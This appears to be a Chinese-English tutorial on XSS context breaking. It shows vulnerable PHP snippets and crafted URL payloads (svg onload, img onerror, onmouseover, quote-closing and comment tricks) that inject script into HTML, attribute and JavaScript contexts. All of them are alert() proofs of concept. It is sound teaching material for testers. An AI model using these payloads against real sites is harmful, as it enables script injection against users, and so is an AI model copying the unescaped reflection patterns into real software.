XSS contexts

XSS contexts

常見的Cross-site scripting context Breaking
*XSS between HTML tags
*XSS in HTML tag attributes
*XSS into JavaScript

 

---

XSS between HTML tags

HTML Context
Case: < tag>You searched for $input. < /tag>

$input example:
< svg onload=alert()>
< /tag>< svg onload=alert()>
< script>alert(document.domain)< /script>
< img src=1 onerror=alert(1)>

ex:
正常網址
http://xsswebsite/xss.php
正常原碼
Hello, < ?=$_GET[“name”]?>!

正常網址後插入XSS
http://xsswebsite/xss.php?name=< svg onload=alert(1)>
因為原碼會改變如下
Hello, < svg onload=alert(1)>!

 

---

XSS in HTML tag attributes

Attribute Context
Case: < tag attribute=“$input”>

$input example:
">< svg onload=alert()>
">< svg onload=alert()>< b attr="
" onmouseover=alert() "
"onmouseover=alert()//
"autofocus/onfocus="alert()

URL Reflection

ex:
正常網址
http://xsswebsite/xss.php
正常原碼
< form action=”< ?=$_SERVER[“PHP_SELF”]?>” method=”POST”>

正常網址後插入XSS
http://xsswebsite/xss.php/”>< svg onload=alert(1)>
ps: 以上可能會被browser XSS filtering擋住

因為原碼會改變如下
< form action=”/xss.php/”>< svg onload=alert(1)>” method=”POST”>

 

Tag Breaking在重建新tag

ex:
正常網址
http://xsswebsite/xss.php?b1=1
正常原碼
< input type="text" name="b1" value="< ?=$_GET[‘b1’]?>">

正常網址後插入XSS
http://xsswebsite/xss.php?b1=">< svg onload=alert(1)>
因為原碼會改變如下
< input type="text" name="b1" value="">< svg onload=alert(1)>">

 

No Tag Breaking

ex:
正常網址
http://xsswebsite/xss.php?b3=1
正常原碼
< input type="text" name="b3" value="< ?=filtertag($_GET[“b3”])?>">
//filtertag() 會把 < 和 > 過濾

正常網址後插入XSS
http://xsswebsite/xss.php?b3=” onmouseover=alert(1)//

因為原碼會改變如下，左邊把雙引號閉合，右邊雙引號透過雙斜線變成註解，
當受害者移到此輸入框時觸發彈窗
< input type="text" name="b3" value="” onmouseover=alert(1)//">

 

---

XSS into JavaScript

JavaScript Context
Case: < script> var new something = ‘$input’; < /script>

$input example:
'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
< /script>< svg onload=alert()>

閉合原本js tag

ex:
正常網址
http://xsswebsite/xss.php?v1=1
正常原碼
< script> var v1 = '< ?=$_GET[“v1”]?>'; < /script>

正常網址後插入XSS
http://xsswebsite/xss.php?v1=< /script>< svg onload=alert(1)>

因為原碼會改變如下，
< script> var v1 = '< /script>< svg onload=alert(1)>'; < /script>

 

閉合單引號並使用-符號連接js code

ex:
正常網址
http://brutelogic.com.br/xss.php?v3=1
正常原碼
< script> var v3 = ''; < /script>
//filterjstag() 會把javascript tag過濾

正常網址後插入XSS
http://brutelogic.com.br/xss.php?v3='-alert(1)-'

因為原碼會改變如下
< script> var v3 = ' '-alert(1)-' '; < /script>

 

Escaped Js

ex:
正常網址
http://brutelogic.com.br/xss.php?v5=1
正常原碼
< script> var v5 = '< ?=filterjstagv2($_GET[“v5”])?>'; < /script>
//filterjstagv2() 會把javascript tag和單引號過濾

正常網址後插入XSS
http://brutelogic.com.br/xss.php?v5='-alert(1)-//

因為原碼會改變如下，左邊用反斜線跳脫單引號，右邊用雙斜線將單引號變註解
< script> var v5 = ''-alert(1)-//'; < /script>

 

---

 

refer
https://github.com/s0md3v/AwesomeXSS
https://portswigger.net/web-security/cross-site-scripting/contexts
https://www.anquanke.com/post/id/86585
https://brutelogic.com.br/blog/the-7-main-xss-cases-everyone-should-know/